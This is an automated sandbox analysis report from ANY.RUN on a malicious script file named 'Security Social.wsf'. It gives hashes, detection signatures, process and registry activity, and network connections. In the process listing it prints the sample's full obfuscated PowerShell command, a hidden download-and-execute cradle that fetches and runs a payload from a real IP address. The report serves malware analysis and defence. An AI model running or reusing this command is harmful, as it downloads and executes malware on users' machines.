File name:

Security Social.wsf

Full analysis: https://app.any.run/tasks/1f714dd3-b5d1-4d15-bd3d-2185252f5f6d
Verdict: Malicious activity
Analysis date: September 18, 2023, 19:39:08
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
opendir
payload
Indicators:
MIME: text/plain
File info: UTF-8 Unicode text, with very long lines, with CRLF line terminators
MD5:

5C1216E506DC842E62F1C47F5970911C

SHA1:

90AD37320F705EAD36AE2CA1BB5CFF6B08BB693C

SHA256:

7C31F37397227621D698AAF51B113F7EFA9B3CCFC0AC574114DD4FCF4FF746AC

SSDEEP:

768:+jjjjjjjjjjj9cccccccccccSjjjjjjjjjjj9cccccccccccxjjjjjjjjjjj9ccm:i

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual connection from system programs

      • wscript.exe (PID: 1872)
    • Bypass execution policy to execute commands

      • powershell.exe (PID: 2928)
    • Changes powershell execution policy (Bypass)

      • wscript.exe (PID: 1872)
    • Run PowerShell with an invisible window

      • powershell.exe (PID: 2928)
  • SUSPICIOUS

    • Connects to unusual port

      • wscript.exe (PID: 1872)
      • powershell.exe (PID: 2928)
    • Starts POWERSHELL.EXE for commands execution

      • wscript.exe (PID: 1872)
    • Reads the Internet Settings

      • wscript.exe (PID: 1872)
      • powershell.exe (PID: 2928)
    • The process hide an interactive prompt from the user

      • wscript.exe (PID: 1872)
    • Possibly malicious use of IEX has been detected

      • wscript.exe (PID: 1872)
    • Probably obfuscated PowerShell command line is found

      • wscript.exe (PID: 1872)
    • Powershell version downgrade attack

      • powershell.exe (PID: 2928)
    • The Powershell connects to the Internet

      • powershell.exe (PID: 2928)
    • Unusual connection from system programs

      • powershell.exe (PID: 2928)
  • INFO

    • Checks proxy server information

      • wscript.exe (PID: 1872)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
37
Monitored processes
2
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start wscript.exe powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
1872"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\Security Social.wsf"C:\Windows\System32\wscript.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
2928"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WIND HIDDeN -eXeC BYPASS -NONI $kuTYFCYytf333='IeX(NeW-OBJeCT NeT.W';$6546FDSZFX='eBCLIeNT).DOWNLO';Sleep 3;[BYTe[]];Sleep 6;$3232CGFCHGC='78TBFRT47TY87GBR8FEGH8VGTVG4T8VG7GTF874G58(''http://194.180.49.181:888/snow.jpg'')'.RePLACe('78TBFRT47TY87GBR8FEGH8VGTVG4T8VG7GTF874G58','ADSTRING');Sleep 5;IeX($kuTYFCYytf333+$6546FDSZFX+$3232CGFCHGC);C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\kernel32.dll
c:\windows\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\atl.dll
Total events
1 850
Read events
1 784
Write events
66
Delete events
0

Modification events

(PID) Process:(1872) wscript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(1872) wscript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(1872) wscript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(1872) wscript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(1872) wscript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
Operation:writeName:ProxyEnable
Value:
0
(PID) Process:(1872) wscript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
Operation:writeName:SavedLegacySettings
Value:
460000004F010000090000000000000000000000000000000400000000000000C0E333BBEAB1D3010000000000000000000000000100000002000000C0A8016B000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
(PID) Process:(1872) wscript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(1872) wscript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(2928) powershell.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\178\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
Executable files
0
Suspicious files
3
Text files
1
Unknown types
0

Dropped files

PID
Process
Filename
Type
2928powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:219900F4E3A0B4B3E1BDF364167D697E
SHA256:F953A7C5F1662C04D86C12EBA0D22A135CC0AE11BAEEE80CC5EFD325582B5F36
1872wscript.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6Z2BCOUL\flake[1].txttext
MD5:3AF9AD9801557D16D7FC48935C6C56D8
SHA256:9687BD949F0CD6C7F427E5816CB700B43499F73C876835BE44BBB492F7AF6ACD
2928powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9A4IQ1NK12KZZPUQ10T2.tempbinary
MD5:219900F4E3A0B4B3E1BDF364167D697E
SHA256:F953A7C5F1662C04D86C12EBA0D22A135CC0AE11BAEEE80CC5EFD325582B5F36
2928powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFfa687.TMPbinary
MD5:219900F4E3A0B4B3E1BDF364167D697E
SHA256:F953A7C5F1662C04D86C12EBA0D22A135CC0AE11BAEEE80CC5EFD325582B5F36
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
5
DNS requests
0
Threats
3

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2928
powershell.exe
GET
194.180.49.181:888
http://194.180.49.181:888/snow.jpg
unknown
unknown
1872
wscript.exe
GET
200
194.180.49.181:888
http://194.180.49.181:888/flake.txt
unknown
text
3.83 Kb
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3284
svchost.exe
239.255.255.250:1900
whitelisted
1872
wscript.exe
194.180.49.181:888
GLOBALCOMPASS
US
unknown
4
System
192.168.100.255:137
whitelisted
4
System
192.168.100.255:138
whitelisted
2928
powershell.exe
194.180.49.181:888
GLOBALCOMPASS
US
unknown

DNS requests

No data

Threats

PID
Process
Class
Message
1872
wscript.exe
Potentially Bad Traffic
SUSPICIOUS [ANY.RUN] Obfuscate VBS with replace
2928
powershell.exe
Potentially Bad Traffic
PAYLOAD [ANY.RUN] HEX encoded PE EXE / DLL File Download
2928
powershell.exe
Misc activity
ET HUNTING [TW] Likely Hex Executable String
No debug info